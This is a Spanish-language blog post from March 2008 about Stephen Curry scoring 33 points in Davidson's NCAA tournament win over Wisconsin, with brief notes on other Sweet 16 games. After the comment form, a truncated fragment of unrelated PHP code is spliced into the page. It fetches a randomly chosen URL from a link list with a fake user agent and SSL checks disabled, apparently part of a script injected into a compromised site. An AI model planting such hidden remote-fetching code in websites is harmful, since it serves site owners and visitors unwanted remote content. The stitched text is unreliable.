Stephen Curry sigue haciendo historia

30 de March de 2008 por Dantley

Stephen Curry is for real. Acostumbrados a jugadores universitarios que apuntan a la NBA simplemente por cuestiones atléticas, el hijo de Dell Muñequita Linda Curry es un soplo de aire fresco. Stephen fue rechazado por las grandes universidades debido a su constitución física más propia de corredores de fondo. Acabó en Davidson, una universidad situada nada menos que en North Carolina, donde lo más noticioso que ha pasado en sus 170 años de vida ha sido … Stephen Curry.

Ayer Davidson venció 73-56 a Wisconsin, un equipo sin estrellas pero con con una solidez que le ha permitido liderar la Big Ten y estar entre los 10 primeros en la mayoría de las quinielas. La primera parte se planteó como un duelo desde el perímetro, el único apartado del juego donde Davidson no era inferior a Wisconsin.

 

Todos los ataques en estático de Davidson eran idénticos. Jason Richards, el base de Davidson es probablemente el único jugador de su equipo -Curry al margen- que estará tentado a vivir del baloncesto, y probablemente fracasará si lo intenta. Pero no se le puede negar que sabe de sus limitaciones, así que hace lo que sabe hacer, mover la bola con criterio y esperar el momento adecuado para pasársela a Curry o para tirar un triple. Mientras, Curry buscaba hasta la extenuación zafarse del pegajoso marcaje de Flowers apoyándose en los continuos bloqueos de sus compañeros. Flowers dejó a Curry en 11 en la primera parte.

En la segunda parte es donde Curry suele explotar. Bajo esa apariencia frágil se esconde un físico resistente que acaba minando las fuerzas de su defensor. Como el mismo decía ayer, 40 minutos son muy largos y siempre llegan los momentos en los que encuentras los huecos. En la segunda parte los encontró: triples, penetraciones, tiros de media distancia… Stephen Curry mostró todo su repertorio de ataque. Los 22 puntos de la segunda mitad para un total de 33, catapultaron a Davidson a lo que a la postre fue una victoria holgada, presenciada por LeBron James en las primeras filas del pabellón.

El domingo espera Kansas. El pronóstico no es muy complicado: gana Kansas con facilidad. Pero Curry quiere seguir haciendo historia. Y si perdieran, ¿sería el último partido de Stephen antes de pasar a profesionales? En la NBA siempre hay sitio para un tirador que sabe buscarse sus propios tiros. Quizá a día de hoy lo más parecido a Curry que se pueda encontrar en la NBA se llama Juan Carlos Navarro. De momento Curry está en primera ronda de los mocks para el draft de 2009. Sin embargo, todos saben que lo que está haciendo Davidson será imposible de repetir. Una promesa de ser drafteado en una primera ronda pudiera hacer cambiar el deseo de Curry de seguir un año más en la universidad. Estaremos atentos.

En el resto de los partidos del Sweet 16 destacamos lo siguiente:

Villanova se despidio de la temporada haciendo un partido bastante malo (Villanova – 57 ; Kansas 72), al descanso ya perdia de 19 y en ningún momento dio impresión de plantarle cara minimamente a Kansas. Partido sin ninguna historia, y no hubo actuaciones de mención. Se esperaba mas lucha de Villanova, Kansas era claro favorito, pero ha sido un paseo militar.

Stanford parecia que este año podia meterse en las finales, pero Texas ha demostrado mas temple en estas fechas. En este equipo destaco el de siempre, Brook Lopez, como no, con un partido clasico de el, 26 puntos/10 rebotes, con 6/6 en tiros libres y dos tapones. El resto del equipo no es gran cosa, y queda demostrado en este partido clave. Buen partido de Augustin y de James por parte de Texas.

Memphis logra meterse en la final South sin muchas complicaciones, el partido de ayer fue un paseo para sus jugadores. Buen partido de Rose y de Douglas-Roberts. Por parte de Michigan destacar a Suton y Allen.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>